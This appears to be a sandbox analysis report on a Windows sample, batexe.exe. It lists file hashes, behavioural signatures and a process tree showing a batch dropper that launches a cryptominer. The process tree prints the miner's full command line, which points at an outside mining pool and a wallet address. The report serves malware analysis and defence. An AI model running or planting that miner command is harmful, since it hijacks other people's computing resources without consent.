Analysis
-
max time kernel
295s -
max time network
291s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-ja -
resource tags
arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows -
submitted
21/02/2024, 07:06
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20240214-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231215-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation batexe.exe Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation b2e.exe -
Executes dropped EXE 2 IoCs
pid Process 3772 b2e.exe 2560 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 2560 cpuminer-sse2.exe 2560 cpuminer-sse2.exe 2560 cpuminer-sse2.exe 2560 cpuminer-sse2.exe 2560 cpuminer-sse2.exe -
resource yara_rule behavioral2/memory/4160-9-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 4160 wrote to memory of 3772 4160 batexe.exe 85 PID 4160 wrote to memory of 3772 4160 batexe.exe 85 PID 4160 wrote to memory of 3772 4160 batexe.exe 85 PID 3772 wrote to memory of 2576 3772 b2e.exe 86 PID 3772 wrote to memory of 2576 3772 b2e.exe 86 PID 3772 wrote to memory of 2576 3772 b2e.exe 86 PID 2576 wrote to memory of 2560 2576 cmd.exe 89 PID 2576 wrote to memory of 2560 2576 cmd.exe 89
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4160 -
C:\Users\Admin\AppData\Local\Temp\5C0A.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\5C0A.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\5C0A.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3772 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6031.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:2576 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2560
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
15.0MB
MD56948ec69ad2218fc078babc0e111df97
SHA1334f427a2f5767c18a44b7986dc02cb4782ceb51
SHA2564f328e52f41d4aa1ecc65816475af13a38dadb3dc310993a935dbc61dc8206ab
SHA512918b37574f1f85e79eb79a9a5d81e9041141b85808da2c1d47413261c5ea09e241dc736a39a42ea5244e4b677c5dc350d7c854f9b252ee66de5466e4457b5dba
-
Filesize
2.7MB
MD581b29eed2dfa918a73b1a7082890eebd
SHA1fb7cddabc40c17b37edfd51cf1ecf1a150ce97f6
SHA256cff7ea54256a99bb3090df6704e08579b9c6c6b6db7d763f65a9b62e0a42c947
SHA51215b1b1c3b7f37b0ada792f2755f24fbbe4d784d89f6655a2da80c72a7c83647fbd9d3b9be94030118cbb61822d8919d07881ac961700adcffa7d1c3439916c7c
-
Filesize
2.8MB
MD51cd1f1463362e82070bd38c1ad8de2d3
SHA102b59eedcca64d1bcdbebabb05228cd292c1fdde
SHA25680c54200113264848b0a02dfef414bee7e1000ae8db116136fad1a6474d43e29
SHA512f67290611bf4653411f513f696f93add280763b3da208f3ad6a5c2b171fde413daf0d6e4909a13d93a08eed4946e98332ba40d07e39ba686cf356da9d87c355f
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
584KB
MD54acd18adc8a80f3cd4ca63125bce05f2
SHA1f72636dd6a9f78570b86a60a2dd61c6e4bec55b0
SHA256f42fbc00712622a84112f6785dff57226485d6fc11807adedf423841f0c9570a
SHA512e6a9f89d42990e2f7b6dccff1410b62fc59350dcebb5936ff760f8f4d983d0230c657671e282feffac9236b67142fe13fab2ad3de60860b8a544c9aef099f212
-
Filesize
465KB
MD595e33e773778ed39ddb9dcd37d6942b0
SHA1bfc9d81fdf74e18617de0fd353adfcfddd03c26f
SHA25677adda42b41b87d019da8dbbcc2ffe19f5a3f36cabb05394acccfb388594678a
SHA512c0321ab79f76e6d35df46d8a6137822a55bd56983497b96e717b6899ba398739d0741a8f16a29243920794fe723a056b871fa020a6f5acb192911b818e8fb098
-
Filesize
417KB
MD5c3242ba4d1486f457f397cef90022851
SHA1a4f9dcc730e1ecf3a7150a9a1fbbb6b109142219
SHA256e40ab3be75fb1e1983a58021f05b2111c28c8ab9f8ba1af2df73105b18ee2fe1
SHA5125833840d86ab774df54743a56a7031e56b7735b32ae8faf1e0089cc55a19f5099ca0b7efba6de2c39f1eab7477515bd3f8615a2ecf589a615eb869efa97b1be4
-
Filesize
448KB
MD519a61444b6e2d01755ede80960bca19c
SHA1e0c7222784d3e2b3329ec3280648b17fd60ef209
SHA25613fd488b38f3b75438e9ad0a033df005cd397f3c92f43275714a0a7eb3fb4db8
SHA512bc02c82bdac19f10f3e3a93d3f507bb7838c9255b7cff5af6e3a7f3b471dae9c45c52728c3c23857b3402dd1702cb51a20f225a4da992c26a997c26d86b6b1d9
-
Filesize
619KB
MD5211061ba55cba94b0b428ff84ec43ac1
SHA129ea75abacc47e4bed5741881d1170ed173b292d
SHA25649639e73aacd271c0aaa636927700464dc90de4168443a9a2fb796f3635afa52
SHA5120f5539c57fb9ca0d7d91112cf6d45b603f466c8eefd0951e7441664d1f0a483e9bbcbc63545c7b9ce3c3d8345b2d89519d5701d900e18ff8d00d8f20591d14ab
-
Filesize
607KB
MD562f585163d3a640bf6ec0bd3372833b2
SHA124c32f0fddf962f0c545fac30062d44db0299202
SHA256aa4a5f2f54f5b08647ac72be5a9feaa912c84c03337e24e59adfd1563e964829
SHA51265c214e884e66867590938cd1a530f377c1ce212af7f95446a2bbd500c7400e8ae6ab7df1491d3049c5b1c004e21b9d38b43a0dddbcac52a79f088813e55781c
-
Filesize
448KB
MD5ca123cec7f705c0af114e462349dc686
SHA175f90b4d95f6774b2f66e4ba790755ef118ab222
SHA2567f141cdc0be9c965e21310bcfb0484b20d31ffd8a6a970f8b5a53c0e8974798a
SHA512650125faa9ae6733f1118caf3101ca6850473f78f9bfc3a87e908eac1c69935e3bc269ffb5de4dd6e867429c1af35c7f3b9e62eb698fa7c9695d68e7115f3f1c
-
Filesize
221KB
MD5173aeddc62ff3b52ce82fc20d983d656
SHA1fecc4fa4138e4cc25c2e3e857ebd26491a139dbb
SHA256214e6041417fc60da1cf9078bd2b77bdf9117e567acc2b76826be3f61f781d05
SHA51288b928e5bb706dbb8c9afe14bf7626af0d3123025c2f7d96a5d1cb34d89cfefc05849065e6cb78a121b3bc34fe6b6a870f8141191864b64b4748ac285352f4ee
-
Filesize
228KB
MD5f6dd6bd646f6f3450b5092d303d103b1
SHA1fff1974f5de7d31993a4ad82add57a7e9d682130
SHA256d4c92200249f1c870f976e2b59e14bded595062b83693c7add67b471a8389f04
SHA512ec7868fa60acfa583f12f5526b52bd1c193502e0d5c9c9035ab19b4633a429170ce1e4ba186d6c1fca8ba058ce84c080fdceebfa95eaa74b88a780bc5babf572
-
Filesize
433KB
MD59c7f0126b6a8f19c26b9220de2d94862
SHA1da3f226dc541d455d2bdf8fb0d72447c0ad69dbc
SHA256d7a4360562f4d8e83cfeb71575dd16e7e51dd90c61f95c995980b5a8dd5f845f
SHA5125700b0a2141d958ca83dbd78f22b5bb16e0d0b6ed0f39c12e2157afd2ca0865443399e1bca39aaec7e876dacf6eb8bc232a7a455986c8d7463c74c432dff6212
-
Filesize
474KB
MD5aee54e95a2e410a92b94966e69518d85
SHA1311a5421f3879cf25b481e89387d44b39869d824
SHA2563b61ab21c2331660b841707cf6872bc606e28a7e467f0fd9889d78a4a359452c
SHA512f6b9accdcf6225b30e034756ad3e2ff83c6c60143dea977234269c05b69b1508ecec59604db024b202b1f52376cfb560d25938051b3a57e8af37ce2edb2c9fa7